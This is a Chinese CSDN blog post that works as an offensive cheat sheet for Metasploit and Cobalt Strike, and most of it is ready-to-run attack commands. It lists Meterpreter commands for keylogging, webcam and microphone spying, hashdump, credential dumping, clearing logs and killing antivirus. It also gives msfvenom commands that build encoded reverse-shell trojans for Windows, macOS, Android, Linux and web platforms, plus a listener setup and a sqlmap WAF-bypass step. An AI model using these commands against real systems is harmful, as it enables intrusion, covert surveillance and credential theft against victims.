CS、MSF

于 2024-05-30 08:55:33 发布
阅读量621 收藏 5
点赞数 19
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A526847/article/details/139310318
版权

MSF会话操作

基本功能

- ?
- help
- bg/background/^z

相关功能

ps 查看进程
getuid # 获取运行木马的用户
getpid # 获取进程号
migrate 7240 # 进程迁移
run vnc # 查看靶机的桌面
execute -f 路径 # 后台运行
kill 结束进程 kill 432

文件管理功能

lpwd # 获取攻击机当前工作目录
lls # 列攻击机当前目录内容
pwd # 获取肉鸡当前工作目录
ls # 列肉鸡当前目录内容
cd # windows下应该用双反斜杠间隔文件名,在遇到空格时应该使用引号
# c:\documents and Settings\administrator\桌面
# C:\Users\Anyone\Desktop
lcd # 切换攻击机本地目录
upload 上传文件
upload /usr/share/windows-resources/binaries/nc.exe c:\\Users\\offsec
download 下载文件
download c:\\windows\\system32\\calc.exe /tmp/calc.exe
mkdir 创建文件夹
edit 编辑文件
mv 移动文件(前提是文件(夹)不存在)
cat 查看文件内容
rm 删除文件
rmdir 文件夹
show_mount # 查看挂载点
search -f ein.ini # 搜索文件

网络功能

arp 查看arp缓存表(IP地址和MAC地址的对照关系)
ifconfig/ipconfig 查看ip地址网卡
netstat 查看端口连接
getproxy # 获取代理

系统功能

ps 查看进程
reg 修改注册表
reboot 重启电脑
shell 获取shell
shutdown 关闭电脑
sysinfo 获取电脑信息
getsystem 获取高权限

其他功能

clearev # 清除日志
bgrun killav # 杀死杀病毒软件
bgrun vnc # 监控
enumdesktops 窗体列表(用户登录数)
keyscan_start 键盘记录-开始
keyscan_dump 键盘记录-下载
keyscan_stop 键盘记录-停止
uictl 获取键盘鼠标的控制权
uictl disable keyboard 锁定键盘
screenshot
record_mic 录制音频
webcam_chat 查看目标的摄像头
webcam_list 摄像头列表
webcam_stream 摄像头监控
hashdump 下载hash密文
route
getsystem: 提权、获取hash
load kiwi
creds_all

CS和MSF插件安装和使用

MSF插件的使用

load xxx
xxx
unload xxx

CS插件的使用

LSTAR为例

开启RDP服务方便远程连接

  • 获得一个beacon连接
  • 用插件开启RDP服务
  • 获得hash,到cmd5上查看对应密码
  • 物理机上输入mstsc,连接肉鸡

编写SQLMap绕WAF插件

改一个绕WAF的tamper脚本并另存,记住脚本文件名

把脚本放入到sqlmap的tamper目录下

运行sqlmap时添加tamper选项绕waf,例如

sqlmap -u "http://xxxx/?id=1" --tamper wide_byte --dbs

MSF多平台木马制作

新版本Kali用 msfvenom 取代了msfpayload和msfencode,常用于生成后门木马。

回忆之前的木马

设立一个监听器

msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost xxx.xxx.xx.xxx
msf6 > set lport 4444
msf6 > run -j

生成第一个木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.xxx LPORT=4444 -f
exe -o wps.exe

参数利用练习

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.xxx LPORT=4444 -x
/usr/share/windows-binaries/vncviewer.exe -e x86/shikata_ga_nai -i 5 -b
'\x00\x0a\xff' -f exe -o vncc.exe

各平台生成payload命令

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.xxx LPORT=4444 -e
x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o radmine-shikatanoadd.exe

Mac

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp
LHOST=192.168.61.111 LPORT=4444 -f macho -o payload.macho

Android

msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.x.x LPORT=4567 -o
payload.apk

Powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp
LHOST=xxx.xxx.x.x LPORT=8888 -e cmd/powershell_base64 -i 3 -f raw -o
payload.ps1

Linux

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp
LHOST=xxx.xxx.xx.xxx LPORT=4567 -f elf -o payload.elf

php

msfvenom -p php/meterpreter_reverse_tcp LHOST=xxx.xxx.xx.xxx LPORT=8888 -f raw
> shell.php

aspx

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp
LHOST=xxx.xxx.xx.x. LPORT=8888 -f aspx -o payload.aspx

JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=xxx.xxx.x.x
LPORT=4567 -f raw -o payload.jsp

war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx.xxx.x.x LPORT=4567 -f raw - o
payload.war

nodejs

msfvenom -p nodejs/shell_reverse_tcp LHOST=xxx.xxx.x.x LPORT=4567 -f raw -o
payload.js

python

msfvenom -p python/meterpreter/reverse_tcp LHOST=xxx.xxx.x.x LPORT=4567 -f
raw -o payload.py

perl

msfvenom -p cmd/unix/reverse_perl LHOST=xxx.xxx.x.x LPORT=4567 -f raw -o
payload.pl

ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=xxx.xxx.x.x LPORT=4567 -f raw -o
payload.rb

亿林数据
关注
  • 19
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CS联动MSF
m0_72125469的博客
05-27 566
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取长补短,我们进行联动。
msfcs互传shell
good good study
04-19 2646
因为cobaltstrike和MSF各有优势,所有有时候需要互传shell。假设cs此时获取了一个shell,然后需要将此shell传给msf 1. 在msf中创建反向监听 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 192.168.
MSFCS联动
GoDunTong's Blog
04-08 4143
转载自Snowming04’s Blog 0x01 准备工作 受害主机:在关闭 Windows Defender 和其他一切杀软的前提下,在 Win 10 主机下进行的实验。 MSF:本地 kali Cobalt Strike 团队服务器:Ubuntu VPS Cobalt Strike:3.14 团队服务器: 客户端: 上线过程: 因为我关闭了一切杀软及 Windows Defender,自不必做免杀。 一些朋友搞不清楚 Windows Executable 和 Windows Exec.
CS + MSF 联动
A_dmin的博客
12-23 1550
CS + MSF 联动 首先cs上已经成功上线: Kali查看IP地址: Msf上操作: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.198.128 set lport 7777 exploit -j #-j 后台监听(ps:这里手抖少打了一个7) 如果msf处于公网,cs添加监听器Listener,HOST和PORT填写msf监听的地址IP:xxxx,PORT:7777
csmsf的联合使用
qq_54030686的博客
11-18 1812
csmsf在内网渗透中的作用 cs主要用于,反弹会话,提权,内网渗透防线,但cs的exp,提权方面没有msf强,但cs以操作简单,图形化界面,比msf强,使用两种工具结合可以很好的完成渗透测试工作,至于empire,基于windows下,与msf功能类似,操作方法也不尽相同,后续带来empire使用方法 csmsf的联合,也就是会话的转移(类似于端口转发) msf会话转移 使用exploit/windows/local/payload_inject模块,开启新的端口,session选择自己想要转发的会话
shellcode加载器
10-02
提到的“CS”和“MSF”标签,指的是“Cobalt Strike”和“Metasploit Framework”。Cobalt Strike是一个高级的渗透测试工具,提供了包括beacon(shellcode执行后的一种通信组件)在内的多种功能。Metasploit ...
Cobalt Strike4.1
12-30
Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 Cobalt ...
cs7.7--渗透测试神器,亲测可以使用,有问题私信
10-10
Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 CobaltStrike集成了端口转发、扫描多模式端口Listener、Windows exe...
第一章 声现象考点及知识点.
07-27
第一章 声现象考点及知识点 努力消化掉这些知识就可以过关鸟
Cobalt Strike
06-17
Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 CobaltStrike集成了端口转发、扫描多模式端口Listener、Windows exe...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8328
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
ubuntu20.04安装教程.docx
07-09
安装 Ubuntu 20.04(Focal Fossa)的步骤如下所示。确保在开始安装之前备份重要数据,以防万一。 1. 下载 Ubuntu 20.04 镜像文件 访问 Ubuntu 官网(https://ubuntu.com/download/desktop)下载 Ubuntu 20.04 的镜像文件。根据你的计算机架构选择合适的版本(通常是 64 位的)。 2. 制作启动盘 你可以使用以下两种方法制作 Ubuntu 的启动盘: 使用 Rufus 制作启动盘(适用于 Windows): 下载并安装 Rufus。 插入空白 USB 驱动器。 打开 Rufus,选择你下载的 Ubuntu 镜像文件。 点击 "开始" 制作启动盘。 使用 Etcher 制作启动盘(跨平台): 下载并安装 Etcher。 打开 Etcher,选择 Ubuntu 镜像文件和你的 USB 驱动器。 点击 "Flash!" 制作启动盘。 3. 安装 Ubuntu 20.04 制作完成后,将 USB 启动盘插入到需要安装 Ubuntu 的计算机上,然后按照以下步骤进行安装: 启动计算机:在 BIOS 设置
贵阳市建筑物矢量数据(Shp格式+带高度).txt
最新发布
07-09
因文件较多,数据存放网盘,txt文件内包含下载链接及提取码,永久有效。失效会第一时间进行补充。
学校安全责任追究制度.docx
07-09
学校安全责任追究制度
述职报告(08)PPT模板.pptx
07-09
述职报告(08)PPT模板.pptx
GPT人工智能方案-1
07-09
### GPT人工智能方案 #### 一、项目背景 近年来,人工智能(AI)技术快速发展,尤其是自然语言处理(NLP)领域的突破使得AI在各种应用场景中得到了广泛的应用。GPT(Generative Pre-trained Transformer)是由OpenAI开发的一种语言模型,它能够生成高质量的自然语言文本。为了在企业和开发者中推广和应用这一技术,我们提出了一个基于GPT的AI方案。 #### 二、目标用户 1. **企业客户**:希望在客服、内容创作、数据分析等方面应用AI技术以提升效率和质量。 2. **开发者**:需要集成高质量的自然语言生成能力到他们的应用中。 3. **科研人员**:进行NLP相关研究和开发。 #### 三、功能模块 1. **文本生成**: - 根据给定的提示生成自然语言文本。 - 支持多种生成模式,包括文章撰写、对话生成、代码生成等。 2. **文本分析**: - 进行情感分析、主题提取等文本处理任务。 - 提供文本摘要和关键字提取功能。 3. **对话系统**: - 构建智能对话系统,支持多轮对话和上下文理解
2024年欧洲静脉-动脉ECMO系统市场主要企业市场占有率及排名.docx
07-09
2024年欧洲静脉-动脉ECMO系统市场主要企业市场占有率及排名.docx
包头市建筑物矢量数据(Shp格式+带高度).txt
07-09
因文件较多,数据存放网盘,txt文件内包含下载链接及提取码,永久有效。失效会第一时间进行补充。
配置maven1111111111111111
07-09
配置maven1111111111111111
msf脚本
05-24
MSF(Metasploit Framework)是一个开源的安全漏洞检测和攻击的工具包,它可以帮助安全研究人员和渗透测试人员进行漏洞探测、漏洞利用和后渗透测试等多种操作。MSF中的脚本是一种自动化的攻击工具,可以快速地执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值